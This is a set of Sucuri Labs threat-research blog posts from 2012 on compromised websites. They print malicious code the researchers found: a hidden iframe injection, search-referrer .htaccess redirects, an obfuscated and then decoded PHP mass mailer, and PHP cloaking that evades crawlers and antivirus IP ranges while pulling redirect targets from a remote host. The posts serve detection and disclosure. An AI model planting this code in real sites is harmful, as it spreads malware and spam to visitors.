Author: Daniel Cid

We are seeing thousands of sites compromised with an iframe from cndexit.com:

This is the iframe that we detected:

http://cdn.cdnexit.com/Home/detect/index.php

Google has already flagged this domain and found it to be responsible for the infection of more than 1.5k sites:

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, cdnexit.com appeared to function as an intermediary for the infection of 1509 site(s) including txt.ir/, remedios-naturais.com/, pornupload.com/.

We can't say for sure how sites got hacked, but we will post more details when we have them. If your siteis compromised, our team can clean it for you: http://sucuri.net/signup

This is a simple way to know when a vulnerability in Plesk (or any other software) is being exploited in the wild:

When the mass scans for it starts. The data is from ISC (isc.sans.org) and shows a massive increase in thenumber of queries for port 8443 (used by Plesk).

Top malware entry for the day: poseyhumane.org/stats.php

<iframe src="http://poseyhumane.org/stats.php" name="Twitter"..
 scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

It seems to be the stats.php malware of the day. Related to our post here: Distributed Malware Network Outbreak Using Stats.php.

We also identified a CC (command and control server) for these infections: http://botstatisticupdate.com/stat/stat.php. More info to come soon.

A few weeks ago we reported the case of a few compromised sites with an .htaccess redirection to msn.com. Now we areseeing a few sites with the same redirection but to google.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://google.com [R=301,L]

.. lots of empty lines/ white spaces ...
ErrorDocument 404 http://google.com

We have no idea why this hapening. Maybe a bug in the attackers malware injection code, but we can\'t say for sure. We will post more details when we find out what is going on.

While looking at a compromised site, we found an interesting mass mailer in there. The contentwas encoded using eval/gzinflate and base64_decode:

<?php eval(gzinflate(base64_decode("1RprcxM58jtV/AehyyZ2rcdjOwkb7NjAhrBLFQGWhLvbAio1npFtLfNC.....</code></pre> <p>But when switching the "eval" for "print" we could see the mass mailer hidden and what it was doing:</p> <p><textarea cols=100 rows=20>$secure = "racrewmania@googlemail.com"; @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; set_time_limit(intval($_POST['timelimit'])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to......."; flush(); $header = "From: $realname <$from>rnReply-To: $replytorn"; $header .= "MIME-Version: 1.0rn"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uidrn"; If ($file_name) $header .= "--$uidrn"; $header .= "Content-Type: text/$contenttypern"; $header .= "Content-Transfer-Encoding: 8bitrnrn"; $header .= "$messagern"; If ($file_name) $header .= "--$uidrn"; If ($file_name) $header .= "Content-Type: $file_type; name="$file_name""rn""; If ($file_name) $header .= ""Content-Transfer-Encoding: base64rn""; If ($file_name) $header .= ""Content-Disposition: attachment; filename=""$file_name""rnrn""; If ($file_name) $header .= ""$contentrn""; If ($file_name) $header .= ""--$uid--""; mail($to</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 28, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1108 --> <article id="post-1109" class="post-1109 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/flagging-google-com-as-malware/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/flagging-google-com-as-malware/" rel="bookmark">Flagging google.com as malware</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Yesterday we listed <code>www.google.com</code> as being used for .htaccess conditional redirectionson hacked sites. Google does no evil, so what happened?</p> <p>We identified the source of the malware, which looks for certain user agents and IP addresses and redirects to <code>www.google.com</code> if it comes from them or to the real malware if not.</p> <p>This is the code:</p> <pre><code>$is_bot = FALSE ; $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', '#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', .. '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#ngb#i' ) ; $stop_ips_masks = array( "66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255 "74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255 "65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255, "74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255 "67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255 "72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255 "38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255 "93\.172\.94\.227", // MacFinder "212\.100\.250\.218", // Wells Search II "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "193\.164\.202\.166", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "77\.193\.236\.225", "84\.155\.170\.196", "69\.174\.58\.36", "128\.103\.64\.[0-9]+", // StopBadWare "150\.70\.[0-9]+\.[0-9]+", // TrendMicro "216\.104\.[0-9]+\.[0-9]+", // TrendMicro "207\.46\.[0-9]+\.[0-9]+", // Microsoft "157\.55\.[0-9]+\.[0-9]+", // Microsoft "213\.180\.[0-9]+\.[0-9]+", // Yandex "217\.23\.[0-9]+\.[0-9]+", // Kaspersky "91\.103\.64\.[0-9]+", // Kaspersky "215\.5\.80\.[0-9]+", // Kaspersky "195\.168\.53\.[0-9]+", // NOD32 "117\.198\.48\.54", "110\.77\.248\.135", "87\.255\.51\.229", "206\.248\.243\.130", "124\.115\.6\.[0-9]+", "170\.252\.248\.[0-9]+", "217\.95\.225\.[0-9]+", "203\.17\.34\.[0-9]+", "220\.255\.1\.[0-9]+", // domain-tool.com "69\.28\.58\.[0-9]+", // Symantec "66\.231\.252\.[0-9]+", "126\.15\.99\.[0-9]+", "209\.128\.28\.[0-9]+", "91\.32\.55\.[0-9]+", "208\.72\.12\.[0-9]+", "84\.136\.88\.[0-9]+", "206\.80\.114\.[0-9]+", "24\.4\.75\.135", "66\.147\.244\.[0-9]+", // freepcsecurity.co.uk "128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu "209\.9\.239\.[0-9]+", // jsunpack.jeek.org "62\.67\.194\.[0-9]+", // support.clean-mx.de "195\.214\.79\.[0-9]+", // support.clean-mx.de "97\.74\.141\.[0-9]+", // malwareurl.com "213\.171\.194\.[0-9]+", // spamhaus "139\.146\.167\.[0-9]+", // malwaredomains "88\.160\.229\.[0-9]+", // malwaredomains "69\.162\.79\.[0-9]+", // malwarebytes "66\.40\.145\.[0-9]+", // bitdefender "66\.223\.50\.[0-9]+", // bitdefender "204\.14\.90\.[0-9]+", // spywarewarrior.com "92\.123\.155\.[0-9]+", // Sophos "213\.31\.172\.[0-9]+", // Sophos "143\.215\.130\.[0-9]+", // Malwaredomainlist "150\.70\.172\.[0-9]+", // TrendNet "64\.88\.164\.[0-9]+", // AVG "102\.157\.192\.[0-9]+", // ZeusTracker "109\.65\.41\.[0-9]+", // ZeusTracker "110\.77\.248\.[0-9]+", // Virustotal "59\.6\.145\.[0-9]+", // Virustotal "67\.124\.37\.[0-9]+", // Virustotal "80\.190\.117\.[0-9]+", // Virustotal "202\.190\.74\.[0-9]+", // Virustotal "209\.160\.33\.[0-9]+", // Virustotal "91\.121\.139\.[0-9]+", // Virustotal "85\.87\.104\.[0-9]+", // Virustotal "96\.50\.0\.[0-9]+", // Virustotal "220\.225\.0\.52" ); foreach ( $stop_ips_masks as $k=>$v ) { if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) ) $is_bot = TRUE ; } if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ) { header("Location: http://www.google.com/"); die(); }</code></pre> <p>So, if you are not familiar with PHP, what this code is doing is checking for the user agent of some bots (Googlebot, MSN, Bing, etc) and for a few IP addresses for bots and anti virus companies (Trend, Bitdefender, etc). If the requests arecoming from them, they ignore the connection and redirect to <code>www.google.com</code>.</p> <p>That\'s why we were seeing <code>www.google.com</code> and listed it on our malware dump (already fixed).</p> <p>For all the other users (the victims), the malware was contacting <code>http://88.198.28.38/api.php?action=link</code> to get the URL to redirect (generally in the .tk domain). Any questions, let us know.</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 21, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1109 --> <article id="post-1110" class="post-1110 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/strange-htaccess-redirections-to-msn-com/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/strange-htaccess-redirections-to-msn-com/" rel="bookmark">Strange .htaccess redirections to msn.com</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>We are seeing something very strange on a few compromised sites lately. Instead ofdoing .htaccess redirections to malware sites, the attackers added the malware to redirect users to msn.com.</p> <p>This is what we are seeing on some hacked sites (.htaccess file):</p> <pre><code>RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://msn.com [R=301,L] .. lots of empty lines/ white spaces ... ErrorDocument 404 http://msn.com</code></pre> <p>If you are not familiar with the .htaccess syntax, it is basically redirecting any users coming from searchengines (Google, Bing, Yahoo and even Twitter/Facebook) to msn.com instead of going to the real site.</p> <p>Anyone have ideas? It seems like a bug in the attackers malware injection code, but we can\'t say for sure. And no, we do not think Microsoft is behind those (conspiracy theory). 🙂</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 18, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1110 --> <nav class="navigation posts-navigation" aria-label="Posts"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://labs.sucuri.net/author/daniel-cid/page/5/" >Older posts</a></div><div class="nav-next"><a href="https://labs.sucuri.net/author/daniel-cid/page/3/" >Newer posts</a></div></div> </nav> </main><!-- #main --> </div><!-- #primary --> </div><!-- #content --> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div> <!-- /.container --> </div> </footer> </div><!-- #page --> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215' id='sucurikb-navigation-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215' id='sucurikb-skip-link-focus-fix-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1' id='foundation-js-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1' id='sucuri-wp-custom-js-js'></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> </body> </html>